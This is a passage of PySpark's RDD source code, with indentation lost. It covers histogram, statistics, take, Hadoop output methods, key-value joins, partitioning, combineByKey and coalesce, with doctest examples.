>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from an RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
.. note:: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first parameter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
try:
yield next(iterator)
except StopIteration:
return
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all.
.. note:: an RDD may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
.. note:: this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
Default partitioner is hash-partition.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
func = fail_on_stopiteration(func)
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one (e.g., merges
the lists)
To avoid memory allocation, both mergeValue and mergeCombiners are allowed to
modify and return their first argument instead of creating a new C.
In addition, users can control the partitioning of the output RDD.
.. note:: V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
>>> def to_list(a):
... return [a]
...
>>> def append(a, b):
... a.append(b)
... return a
...
>>> def extend(a, b):
... a.extend(b)
... return a
...
>>> sorted(x.combineByKey(to_list, append, extend).collect())
[('a', [1, 2]), ('b', [1])]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
.. note:: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute evenly the elements across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(PickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
